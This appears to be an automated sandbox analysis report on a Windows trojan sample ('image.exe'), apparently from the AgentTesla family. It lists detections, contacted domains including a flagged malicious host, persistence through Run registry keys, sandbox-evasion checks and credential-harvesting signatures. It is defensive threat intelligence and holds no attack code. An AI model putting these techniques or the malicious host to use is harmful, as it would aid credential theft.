                    Access Token Manipulation                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron361
                    Virtualization/Sandbox Evasion                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd211
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                    Hidden Files and Directories                    		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1492221 Sample: image.exe Startdate: 13/08/2024 Architecture: WINDOWS Score: 100 58 ip-api.com 2->58 60 evdanco.ru 2->60 62 api.ipify.org 2->62 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Antivirus detection for URL or domain 2->74 76 11 other signatures 2->76 10 image.exe 3 2->10         started        signatures3 process4 file5 50 C:\Users\user\AppData\Local\...\image.exe.log, ASCII 10->50 dropped 100 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->100 102 Hides that the sample has been downloaded from the Internet (zone.identifier) 10->102 104 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 10->104 14 cmd.exe 3 10->14         started        18 cmd.exe 1 10->18         started        signatures6 process7 file8 52 C:\Users\user\AppData\Roaming\ACID.exe, PE32 14->52 dropped 54 C:\Users\user\...\ACID.exe:Zone.Identifier, ASCII 14->54 dropped 106 Uses ping.exe to sleep 14->106 20 ACID.exe 5 14->20         started        24 conhost.exe 14->24         started        26 PING.EXE 1 14->26         started        28 PING.EXE 1 14->28         started        108 Uses ping.exe to check the status of other devices and networks 18->108 30 reg.exe 1 1 18->30         started        32 PING.EXE 1 18->32         started        35 conhost.exe 18->35         started        signatures9 process10 dnsIp11 46 C:\Users\user\AppData\Local\...\watchdog.exe, PE32 20->46 dropped 78 Multi AV Scanner detection for dropped file 20->78 80 Machine Learning detection for dropped file 20->80 82 Writes to foreign memory regions 20->82 86 3 other signatures 20->86 37 InstallUtil.exe 16 4 20->37         started        42 watchdog.exe 2 20->42         started        84 Creates multiple autostart registry keys 30->84 56 127.0.0.1 unknown unknown 32->56 file12 signatures13 process14 dnsIp15 64 ip-api.com 208.95.112.1, 49728, 80 TUT-ASUS United States 37->64 66 evdanco.ru 80.96.42.133, 49729, 587 RCS-RDS73-75DrStaicoviciRO Romania 37->66 68 api.ipify.org 104.26.13.205, 443, 49727 CLOUDFLARENETUS United States 37->68 48 C:\Users\user\AppData\Roaming\...\VsUPptm.exe, PE32 37->48 dropped 88 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 37->88 90 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->90 92 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 37->92 98 5 other signatures 37->98 94 Antivirus detection for dropped file 42->94 96 Multi AV Scanner detection for dropped file 42->96 44 watchdog.exe 42->44         started        file16 signatures17 process18

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    image.exe34%ReversingLabsWin32.Trojan.Generic
                    image.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\watchdog.exe100%AviraTR/Agent.able
                    C:\Users\user\AppData\Roaming\ACID.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\watchdog.exe83%ReversingLabsByteCode-MSIL.Trojan.CrypterX
                    C:\Users\user\AppData\Roaming\ACID.exe34%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Roaming\VsUPptm\VsUPptm.exe0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    https://api.ipify.org/t0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                    http://ip-api.com0%URL Reputationsafe
                    http://evdanco.ru100%Avira URL Cloudmalware
                    http://purl.oen0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    evdanco.ru
                    		80.96.42.133
                    		truetrue
                      		unknown
                      api.ipify.org
                      		104.26.13.205
                      		truefalse
                        		unknown
                        ip-api.com
                        		208.95.112.1
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                          • URL Reputation: safe
                          		unknown
                          http://ip-api.com/line/?fields=hostingfalse
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgimage.exe, 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3445933830.0000000003051000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://account.dyn.com/image.exe, 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.ipify.org/tInstallUtil.exe, 00000010.00000002.3445933830.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000010.00000002.3445933830.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://evdanco.ruInstallUtil.exe, 00000010.00000002.3445933830.00000000030DD000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://ip-api.comInstallUtil.exe, 00000010.00000002.3445933830.00000000030A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://purl.oenACID.exe, 0000000F.00000002.3477111362.0000000007D18000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          208.95.112.1
                          		ip-api.comUnited States
                          		53334TUT-ASUStrue
                          80.96.42.133
                          		evdanco.ruRomania
                          		8708RCS-RDS73-75DrStaicoviciROtrue
                          104.26.13.205
                          		api.ipify.orgUnited States
                          		13335CLOUDFLARENETUSfalse

                          Private

                          IP
                          127.0.0.1

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1492221
                          Start date and time:2024-08-13 16:28:38 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 58s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:20
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:image.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@23/10@3/4
                          EGA Information:
                          • Successful, ratio: 60%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 156
                          • Number of non-executed functions: 11
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target watchdog.exe, PID 1832 because it is empty
                          • Execution Graph export aborted for target watchdog.exe, PID 4048 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: image.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          10:29:41API Interceptor42x Sleep call for process: image.exe modified
                          10:30:53API Interceptor123x Sleep call for process: ACID.exe modified
                          10:31:37API Interceptor22x Sleep call for process: InstallUtil.exe modified
                          16:29:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ACID C:\Users\user\AppData\Roaming\ACID.exe
                          16:30:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ACID C:\Users\user\AppData\Roaming\ACID.exe
                          16:31:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VsUPptm C:\Users\user\AppData\Roaming\VsUPptm\VsUPptm.exe

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          208.95.112.1SHIPMENT-DETAILS_pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          SWIFT_SO-P1010922.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          informe - 2024-08-09T174159.596.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          Loader.exeGet hashmaliciousZTratBrowse
                          • ip-api.com/xml/?fields=countryCode,query
                          solicitud de cotizacion0089087785.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          TMP-070-202409082567.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          RobloxCodeBruter.exeGet hashmaliciousXWormBrowse
                          • ip-api.com/line/?fields=hosting
                          setup.exeGet hashmaliciousXWormBrowse
                          • ip-api.com/line/?fields=hosting
                          Server.exeGet hashmaliciousAsyncRAT, XWorm, XmrigBrowse
                          • ip-api.com/line/?fields=hosting
                          setup.exeGet hashmaliciousXWormBrowse
                          • ip-api.com/line/?fields=hosting
                          80.96.42.133devil.vbeGet hashmaliciousAgentTeslaBrowse
                            ZUpK81URgS.exeGet hashmaliciousAgentTeslaBrowse
                              wxNW7IVzIp.exeGet hashmaliciousAgentTeslaBrowse
                                QUOTATION.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  104.26.13.205SecuriteInfo.com.Win64.Evo-gen.28044.10443.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                                  • api.ipify.org/
                                  golang-modules.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  242764.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                  • api.ipify.org/?format=wef
                                  Ransom.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                  • api.ipify.org/
                                  ld.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                  • api.ipify.org/
                                  ReturnLegend.exeGet hashmaliciousStealitBrowse
                                  • api.ipify.org/?format=json
                                  SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                  • api.ipify.org/
                                  Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                  • api.ipify.org/?format=json

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  ip-api.comSHIPMENT-DETAILS_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  https://www.hitpaw.net/sem/hitpaw-video-enhancer.html?gad_source=1&gclid=Cj0KCQjw5ea1BhC6ARIsAEOG5pz1R08RbPMAuwS5INSCuFi4ByNPHfKUrpl73-bCLl2w94oo0g81yCgaAsDrEALw_wcBGet hashmaliciousUnknownBrowse
                                  • 51.77.64.70
                                  SWIFT_SO-P1010922.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  informe - 2024-08-09T174159.596.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  Loader.exeGet hashmaliciousZTratBrowse
                                  • 208.95.112.1
                                  solicitud de cotizacion0089087785.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  TMP-070-202409082567.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  RobloxCodeBruter.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  setup.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  Server.exeGet hashmaliciousAsyncRAT, XWorm, XmrigBrowse
                                  • 208.95.112.1
                                  evdanco.rudevil.vbeGet hashmaliciousAgentTeslaBrowse
                                  • 80.96.42.133
                                  ZUpK81URgS.exeGet hashmaliciousAgentTeslaBrowse
                                  • 80.96.42.133
                                  wxNW7IVzIp.exeGet hashmaliciousAgentTeslaBrowse
                                  • 80.96.42.133
                                  QUOTATION.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 80.96.42.133
                                  api.ipify.orgordine di acquisto ON15570.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  ordine di acquisto ON15570.exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.74.152
                                  pago.exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.74.152
                                  invoice.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  Shipping docs.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  MV TBN - VESSEL_details.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 104.26.12.205
                                  MV FIONA - VESSEL'S PARTICULARS (0)(1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 104.26.13.205
                                  https://t1.a.editions-legislatives.fr/r/?id=hfe20c57e,3602a3f1,7f94ba88&p1=papsolutionsptyltd.sharefile.com/public/share/web-scf26ff3a4b6d4c1db1815de3794eb6beGet hashmaliciousHTMLPhisherBrowse
                                  • 104.26.12.205
                                  ARRIVAL NOTICE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 104.26.13.205
                                  NINGBO-Invoices-Past Due.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                  • 172.67.74.152

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDFLARENETUShttps://t.co/HabMZWSJ3fGet hashmaliciousHTMLPhisherBrowse
                                  • 172.67.206.153
                                  https://u46158161.ct.sendgrid.net/ls/click?upn=u001.StSodu0PS4xAHWUBPquyp0biXYNUE1xClPbog2TAE8raqnWa6SPwaz-2FNr-2B87SU-2FQyIyS_uld-2Buw4PU-2FGPIaOUmIz7DITa6GBdygAMshgqPclk0h0kYgb3uUwooEVcuadGUivHcBVltljb2DWDnI0DtwXa4WUtU-2F-2FvAeHYvcXM2-2BBv83Z-2FvmwbeuumMh1Z5k-2FECg-2BuoKbvUWPScbH6gCUtnLvM6PTvgCdxJ54fl4Ak0WXptY6hSyOn4Ut9bFkkoi0la2yqTk8DNzixw1Ob5iaFnAyM-2Fih7YJHjdzegTsK-2FE3ILMrVDSZGLuZH9lRnqW6GTOKHtdqIc-2FntT5tP4RKn726p4NR6pLUT9s66CvxqITqPtJWtNhYCU-2FPxeXNx0GkuN0LHRx-2FdNKG0GZdr0bC9j0Pjs-2FXnnRnqdgtv8wZYJXDkoxJEaAQyqxuvPFTalR6GOwCMI81tUvKFy1JCPPXkJrSD3WCmehjmXta2ZIAwulLGrVA0johq4HIDjvcfR3FTdUfDOGeQ3qWuPb-2BInufkenPhnFCb6wG1pHwnffLr-2BwxuKVUDRhkFo6e3bF-2FnoM5jNNc6BwpMEsUzOOmhMDTsSGLiESbixxqGxuPwu5ChErGyrJShlw03Ga2rgrEnascDQjkHDgZtt612RrKiTLy6SP7jnqItyY8bmlP9lXAi6tLSJIiY26HAMsSCUfoyBX90JFr-2BaIAIRH9xWFWuigMpCEgyFH7hIDBo5XwQfpEKUGGOoUsuz-2Bp0cY-2Fx1Y7QAxb957hycIdWZPqzMWwTfMqqR6m4I07hAHcvy6Fh7AOYisdq-2BBYXnEHKdqNzU433XYfxYVw7b1xlTFN6Z1pP-2B5h3-2BT8R2319TDIw43xDAC-2FY2AAbLNBYwJC8Y6a-2Brg9Xwlkud8-2FKpmfEsVuyLDSS8fVYSheyXmQ-3D-3DGet hashmaliciousUnknownBrowse
                                  • 172.64.151.101
                                  https://u46158161.ct.sendgrid.net/ls/click?upn=u001.StSodu0PS4xAHWUBPquypwV5wfYj-2BYPO5jgxW7H-2BzbHXbljXTXa-2Ba-2FbnNOYrl3vEGvGdZ1-2Fmedbg5aL5gqsfgg-3D-3DjNss_uld-2Buw4PU-2FGPIaOUmIz7DITa6GBdygAMshgqPclk0h0kYgb3uUwooEVcuadGUivHcBVltljb2DWDnI0DtwXa4WUtU-2F-2FvAeHYvcXM2-2BBv83Z-2FvmwbeuumMh1Z5k-2FECg-2BuoKbvUWPScbH6gCUtnLvM6PTvgCdxJ54fl4Ak0WXptY6hSyOn4Ut9bFkkoi0la2yqTk8DNzixw1Ob5iaFnAyM-2Fih7YJHjdzegTsK-2FE3ILMrVDSZGLuZH9lRnqW6GTOKHtdqIc-2FntT5tP4RKn726p4NR6pLUT9s66CvxqITqPtJWtNhYCU-2FPxeXNx0GkuN0LHRx-2FdNKG0GZdr0bC9j0Pjs-2FXnnRnqdgtv8wZYJXDkoxJEaAQyqxuvPFTalR6GOwCMI81tUvKFy1JCPPXkJrSD3WCmehjmXta2ZIAwulLGrVA0johq4HIDjvcfR3FTdUfDOGeQ3qWuPb-2BInufkenPhnFCb6wG1pHwnffLr-2BwxuKVUDRhkFo6e3bF-2FnoM5jNNc6BwpMEsUzOOmhMDTsSGLiESbixxqGxuPwu5ChErGyrJShlw03Ga2rgrEnascDQjkHDgZtt612RrKiTLy6SP7jnqItyY8bmlP9lXAi6tLSJIiY26HAMsSCUfoyBX90JFr-2BaIAIRH9xWFWuigMpCEgyFH7hIDBo5XwQfpEKUGGOoUsuz-2Bp0cY-2Fx1Y7QAxb957hycB0gM68sKRZGF3jT-2BZMXDeQlXih0qXdkY1TlJcgrnJFuvaxtF5JxujOq-2B6YVOH51BpdgdSwL2JZgDLBwhjaff1iTyZVNGSv0Pizu7bs6Jm9hAawn68IzgaYoA4E-2BdWBIcjRR50M1sp2WvdhpFxuNEUg-3D-3DGet hashmaliciousUnknownBrowse
                                  • 104.18.20.83
                                  OMSG2024080890D-KHOJALY-LANSHAN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 188.114.96.3
                                  ORDER 0475.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                  • 188.114.97.3
                                  ordine di acquisto ON15570.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  ordine di acquisto ON15570.exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.74.152
                                  pago.exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.74.152
                                  invoice.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  RFQ 24737852.exeGet hashmaliciousUnknownBrowse
                                  • 188.114.96.3
                                  RCS-RDS73-75DrStaicoviciROdevil.vbeGet hashmaliciousAgentTeslaBrowse
                                  • 80.96.42.133
                                  mips.elfGet hashmaliciousMiraiBrowse
                                  • 5.12.39.92
                                  botx.arm.elfGet hashmaliciousMiraiBrowse
                                  • 86.122.224.63
                                  sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                  • 79.116.181.228
                                  sora.mips.elfGet hashmaliciousMiraiBrowse
                                  • 86.120.18.245
                                  ZUpK81URgS.exeGet hashmaliciousAgentTeslaBrowse
                                  • 80.96.42.133
                                  77.90.35.9-skid.arm5-2024-07-30T07_10_52.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 5.12.90.101
                                  wxNW7IVzIp.exeGet hashmaliciousAgentTeslaBrowse
                                  • 80.96.42.133
                                  x86_64.elfGet hashmaliciousMiraiBrowse
                                  • 86.120.245.139
                                  QUOTATION.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 80.96.42.133
                                  TUT-ASUSSHIPMENT-DETAILS_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  SWIFT_SO-P1010922.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  informe - 2024-08-09T174159.596.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  Loader.exeGet hashmaliciousZTratBrowse
                                  • 208.95.112.1
                                  solicitud de cotizacion0089087785.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  TMP-070-202409082567.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  RobloxCodeBruter.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  setup.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  Server.exeGet hashmaliciousAsyncRAT, XWorm, XmrigBrowse
                                  • 208.95.112.1
                                  setup.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0eOMSG2024080890D-KHOJALY-LANSHAN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 104.26.13.205
                                  ORDER 0475.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                  • 104.26.13.205
                                  ordine di acquisto ON15570.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  ordine di acquisto ON15570.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  education.htmlGet hashmaliciousUnknownBrowse
                                  • 104.26.13.205
                                  pago.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  invoice.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  Product Requirement Specification.scr.exeGet hashmaliciousUnknownBrowse
                                  • 104.26.13.205
                                  PO SSCJ-2406002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 104.26.13.205
                                  Shipping docs.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Local\Temp\watchdog.exefile.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                    Approved_Invoice_0000384834.exeGet hashmaliciousDarkTortilla, RedLine, XWorm, zgRATBrowse
                                      po-544-8370.exeGet hashmaliciousDarkTortilla, RedLine, XWorm, zgRATBrowse
                                        Approved PO.exeGet hashmaliciousDarkTortilla, RedLine, XWormBrowse
                                          SO-0093848222.exeGet hashmaliciousDarkTortilla, RedLine, XWormBrowse
                                            LLC_KHIMAKTIV_SOFT_Po_Official_2023.exeGet hashmaliciousDarkTortilla, RedLine, XWormBrowse
                                              SO-x-008387489.exeGet hashmaliciousDarkTortilla, RedLine, XWormBrowse
                                                IB7QP60Fdx.exeGet hashmaliciousAveMaria, DarkTortilla, UACMeBrowse
                                                  Quote_for_order.exeGet hashmaliciousAveMaria, DarkTortilla, UACMeBrowse
                                                    PO_No.254990-81723.exeGet hashmaliciousAveMaria, DarkTortilla, UACMeBrowse

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\image.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\image.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLU84qpE4KlKDE4KhKiKhIE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4j:Mgv2HKlYHKh3oIHKx1qHitHo6hAHKzea
                                                      MD5:FB53815DEEC334028DBDE4E3660E26D0
                                                      SHA1:7F491359EC244406DFC8AA39FC9B727D677E4FDF
                                                      SHA-256:C3EC8D6C079B1940D82374A85E9DC41ED9FF683ADA338F89E375AA7AC777749D
                                                      SHA-512:5CC466901D7911BE1E1731162CC01C371444AAFA9A504F1F22516F60C888048EB78B5C5A12215EE2B127BD67A19677E370686465E85E08BC14015F8FAB049E49
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\watchdog.exe.log

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\watchdog.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1362
                                                      Entropy (8bit):5.342650164635672
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4KlKDE4KhKiKhuE4UofoJE4r4CeylEE4aP6AE4KIRQ84j:MxHKlYHKh3ouHgJHreylEHMHKoQvj
                                                      MD5:D82ED94A6CE58CB457D58446EB9CFEB0
                                                      SHA1:67CDFD6F1503AEB97A7315B68CA9A7369CBA1710
                                                      SHA-256:04E9DBED386B13AB2E42E6CBA204EF2C17B3BF44DBC30BDF673A79F4FB98166A
                                                      SHA-512:3079B8B8131DC9BF8272FEC475A9A5C685E0DA9CDD881801DD0570EB51C8827541DFF1959BB6B7A7C27A40257AC316D3BF815BEC2690AEA0407E019CAE37D3BE
                                                      Malicious:false
